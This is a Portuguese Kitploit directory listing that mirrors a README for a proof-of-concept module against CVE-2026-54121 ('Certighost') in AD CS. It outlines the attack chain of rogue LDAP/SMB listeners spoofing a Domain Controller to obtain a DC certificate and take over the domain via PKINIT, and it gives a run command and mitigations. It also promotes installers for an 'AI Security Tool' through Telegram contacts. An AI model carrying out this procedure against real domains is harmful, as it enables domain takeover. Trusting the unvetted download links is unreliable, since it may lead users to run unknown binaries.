Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-54121-Certighost — Módulo proof-of-concept para CVE-2026-54121 (Certighost), explorando a validação de inscrição do AD CS por meio de listeners LDAP/SMB rogue para se passar por um Domain Controller e escalar via PKINIT. | Kitploit
Ferramentas/GitHubGitHub/zerodayevil/cve-2026-54121-certighost
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoFerramentas de ImpersonaçãoPós-ExploraçãoTestes de PenetraçãoAutenticaçãoPapers e PesquisaRed Teaming

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHubzerodayevil/cve-2026-54121-certighost

CVE-2026-54121-Certighost

Módulo proof-of-concept para CVE-2026-54121 (Certighost), explorando a validação de inscrição do AD CS por meio de listeners LDAP/SMB rogue para se passar por um Domain Controller e escalar via PKINIT.

Ver Repositório
há 13h 48mAinda não revisado

🛡 Módulo de Ferramenta de Segurança de IA
CVE-2026-54121: Representação de Identidade no Active Directory Certificate Services (Certighost)

Módulo Oficial de Auditoria de Segurança para o Ecossistema de Ferramentas de Segurança de IA


Latest Release Build Status Donations Telegram Channel License

🌐 Demonstração Web • 📚 Site do Projeto • 💬 Chat da Comunidade

Navegação do Site: Início • Atualizações • Downloads • Módulos

AI Security Tool Banner


🧠 Visão Conceitual

Este módulo fornece capacidades de diagnóstico para o CVE-2026-54121, apelidado de Certighost. A vulnerabilidade existe dentro do Active Directory Certificate Services (AD CS) durante a fase de validação das inscrições de certificados de contas de computador.

Um atacante que possua credenciais de domínio padrão de baixo privilégio cria uma nova conta de computador e envia uma solicitação de certificado contendo atributos manipulados cdc (listener de IP controlado) e rmd (FQDN do DC alvo). Quando a Autoridade de Certificação (CA) se conecta de volta para validar a identidade da máquina, listeners maliciosos de LDAP (porta 389) e SMB/LSA (porta 445) falsificam os atributos de identidade do Controlador de Domínio alvo (sAMAccountName, SID, dNSHostName). Isso engana a CA, fazendo-a emitir um certificado autêntico de Controlador de Domínio, permitindo o comprometimento total do domínio via PKINIT.

🎯 Filosofia Central de Impacto

"Autentique-se como uma máquina, escale para o domínio inteiro."
O Certighost contorna as permissões tradicionais de templates do AD CS ao envenenar o pipeline de resolução de identidade da CA. A obtenção de um certificado válido de Controlador de Domínio concede autenticação PKINIT instantânea, produzindo tanto um cache de credenciais TGT (.ccache) quanto o hash NT do DC alvo.

📊 Especificações da Vulnerabilidade

🕸 Cenário de Ataque & Arquitetura

root@kitploit:~
graph TD
    A[Low-Priv Domain User] -->|1. Create Computer Account| B[Domain Controller]
    A -->|2. Start Rogue SMB 445 / LDAP 389 Listeners| C[Attacker Machine]
    A -->|3. Submit Cert Request with cdc & rmd Attributes| D[Active Directory CA]
    D -->|4. CA Lookups Connect to Rogue Listeners| C
    C -->|5. Validate via Netlogon & Return Target DC Identity| D
    D -->|6. Issue Valid DC Certificate .pfx| A
    A -->|7. Perform PKINIT with DC Certificate| E[Full Domain Takeover / NT Hash Export]

🛡 Lista de Verificação de Mitigação

  • 🟢 Aplicar Atualizações de Segurança: Implantar os patches oficiais da Microsoft que abordam o CVE-2026-54121 em todos os servidores AD CS.
  • 🟢 Restringir a Criação de Contas de Máquina: Definir ms-DS-MachineAccountQuota como 0 para impedir que usuários não administradores criem novos objetos de computador.
  • 🟡 Fortalecimento do AD CS: Desabilitar templates de certificado vulneráveis e garantir que EDITF_ATTRIBUTESUBJECTALTNAME2 (ESC6) esteja desativado, a menos que seja explicitamente necessário.
  • 🟡 Filtragem de Rede: Bloquear o tráfego de saída SMB (445) e LDAP (389) dos servidores CA para estações de trabalho arbitrárias.

💻 Como Executar este Módulo

⚠️ IMPORTANTE: Este módulo foi projetado para testes de diagnóstico seguros dentro do framework AI Security Tool. Execute apenas contra alvos autorizados com privilégios administrativos elevados.

1️⃣ Instalar o AI Security Tool

Para executar os scripts de diagnóstico e monitoramento, instale o framework principal do AI Security Tool:

2️⃣ Instalar Dependências & Execução

Instale as bibliotecas Python necessárias para listeners maliciosos de LDAP/SMB e manipulação de certificados:

root@kitploit:~
# Install python dependencies
sudo pip install --break-system-packages git+https://github.com/fortra/impacket.git cryptography pyasn1 asn1crypto pycryptodome dnspython

# Execute Certighost proof-of-concept (Requires root for ports 389/445)
sudo python3 certighost.py -d playground.local -u lowpriv -p 'Password1234' --dc-ip 192.168.1.10

🔍 Módulos de Auditoria de Segurança & Repositórios de PoC

Módulos de scanner de vulnerabilidades, scripts de PoC e repositórios de pesquisa mantidos pela nossa comunidade:

🔥 Execução Remota de Código (RCE) & Vulnerabilidades de Rede 4 módulos
  • CVE-2026-41089 — Exploit de Execução Remota de Código no Netlogon @ZeroDayEvil
  • CVE-2026-20805 — Prova de Conceito de Execução Remota de Código no Windows @ZeroDayEvil
  • CVE-2026-41096 — Módulo Scanner de Vulnerabilidade RCE Crítica @ZeroDayEvil
  • CVE-2026-24291 — Execução Remota de Código em Protocolo de Rede @ZeroDayVPN
🛡 Escalação de Privilégios (EoP) & Serviços 3 módulos
  • CVE-2026-54121 — Representação de Identidade de Controlador de Domínio via AD CS Certighost @ZeroDayEvil
  • CVE-2026-66804 — Escalação de Privilégios no Serviço CrossDevice @ZeroDayVPN
  • CVE-2026-50416 — Writeup & PoC de Escalação de Privilégios Local @ZeroDayEvil
📚 Pesquisa de Vulnerabilidades & Writeups 2 módulos
  • CVE-2026-42978 — Análise Técnica Aprofundada & Pesquisa de PoC @ZeroDayEvil
  • CVE-2026-83991 — WriteUp Completo & Demonstração de Exploração @ZeroDayVPN

⚖️ Licença & Aviso Legal

🚨 Aviso Legal

Esta ferramenta e análise de segurança são fornecidas estritamente para auditoria autorizada de sistemas, pesquisa defensiva e engajamentos de teste de penetração.
Executar o CVE-2026-54121 contra ambientes de domínio sem permissão expressa por escrito do proprietário do sistema é ilegal. Os autores não assumem qualquer responsabilidade por comprometimento não autorizado de domínio, perda de dados ou interrupções de sistema.

🔄 Contribuição & Comunidade

Acolhemos contribuições da comunidade de pesquisa de segurança! Principais áreas de contribuição:

  1. Integrações de IA: Adicionar novos provedores de LLM e desenvolver agentes de segurança especializados.
  2. Ferramentas de Segurança: Desenvolver módulos de vulnerabilidade e integrar scanners de CLI.
  3. Otimização: Melhorar a velocidade do parser, a segurança de execução e a lógica de cache.
  4. Documentação: Escrever artigos de pesquisa, guias e traduções localizadas.

🔗 Contato & Suporte

  • Site Oficial: ZeroDayEvil.com
  • Análise Técnica: Análise Detalhada por H0j3n
  • Advisory da MSRC: Guia do CVE-2026-54121
  • Administrador do Telegram: @ZeroDayEvil
  • Chat do Telegram: @ZeroDyaTool_chat
  • Canal do Telegram: @ZeroDyaTool_channel
  • Patrocinar o Projeto: Doações via PayPal
  • Open Collective: opencollective.com/ZeroDayEvil

AI Security Tool — Reimaginando o fluxo de trabalho em terminal e a automação para profissionais de cibersegurança.

Baixar ferramenta
EspecificaçãoValor AtribuídoObservações
Identificador CVECVE-2026-54121Representação de Identidade no Active Directory Certificate Services
Classificação de SeveridadeCrítica (CVSS v3.1: 9.8)CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Tipo de VulnerabilidadeCWE-287 / CWE-290Autenticação Imprópria / Bypass de Autenticação via Spoofing
Componente AfetadoActive Directory Certificate Services (AD CS)Pipeline de Inscrição de Certificados e Validação de Identidade
Vetor de AtaqueRedeExecutado remotamente através dos protocolos SMB, LDAP e RPC
Privilégios NecessáriosBaixos PrivilégiosConta de usuário de domínio padrão (capacidade de adicionar contas de máquina)
SO / PlataformaVersãoArquitetura / FormatoData de LançamentoStatusLink de Download
🪟 Windowsv6.3.20Instalador x64 (.exe)2026-09-08🟢 Mais RecenteBaixar .exe
🪟 Windowsv6.3.20Portátil x64 (.tar.gz)2026-09-08🟢 Mais RecenteBaixar .tar.gz
🍏 macOSv5.3.29Apple Silicon M1/M2/M3 (.dmg)2026-09-05🟢 EstávelBaixar .dmg
🐧 Linuxv5.3.27Universal x64 (.tar.gz)2026-09-01🟢 EstávelBaixar .tar.gz
🤖 Androidv8a 5.3.27ARM64 APK (.apk)2026-09-01🟢 EstávelBaixar .apk